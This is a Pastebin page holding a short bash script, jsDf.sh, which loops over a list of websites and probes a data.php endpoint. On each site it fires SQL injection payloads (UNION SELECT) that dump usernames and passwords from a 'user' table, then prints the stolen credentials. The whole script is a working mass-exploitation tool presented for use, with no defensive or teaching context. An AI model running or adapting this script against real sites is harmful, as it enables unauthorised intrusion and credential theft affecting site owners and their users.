Ng4P4L

jsDf.sh

Aug 5th, 2021
775
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. while IFS= read -r sites ;do
  2.  
  3. echo -e "\e[1;34mChecking $sites\e[0m"
  4.  
  5. check=$(curl -Iks $sites/data.php?content_id=4 | head -n 1 | grep -o '[200]\+')
  6.  
  7. if [[ $check == "200" ]];then
  8.  
  9. echo -e "\e[1;32mFound Injection Point\e[0m"
  10.  
  11. sql=$(curl -s --connect-timeout 5 "$sites/data.php?content_id=4%27UnioN%20SeLect%201,2,concat(%27%3Csql%3E%27,user_name,0x3a3a,user_pass,%27%3C/sql%3E%27),4%20from%20user--%20-" | grep -o '<sql>.*</sql>' | sed 's/\(<sql>\|<\/sql>\)//g')
  12.  
  13. if [[ $sql == "" ]];then
  14.  
  15. sql2=$(curl -s --connect-timeout 5 "$sites/data.php?content_id=4%27UnioN%20SeLect%201,2,3,concat(%27%3Csql%3E%27,user_name,0x3a3a,user_pass,%27%3C/sql%3E%27),5%20from%20user--%20-" | grep -o '<sql>.*</sql>' | sed 's/\(<sql>\|<\/sql>\)//g')
  16.  
  17. echo -e "\e[1;33m$sites\e[0m"
  18. echo -e "\e[1;32m$sql2\e[0m"
  19. else
  20.  
  21. echo -e "\e[1;33m$sites\e[0m"
  22.  
  23. echo -e "\e[1;32m$sql\e[0m"
  24.  
  25. fi
  26.  
  27. else
  28.  
  29. echo -e "\e[1;31mNo Vul Found\e[0m"
  30.  
  31. fi
  32.  done < sites.txt
RAW Paste Data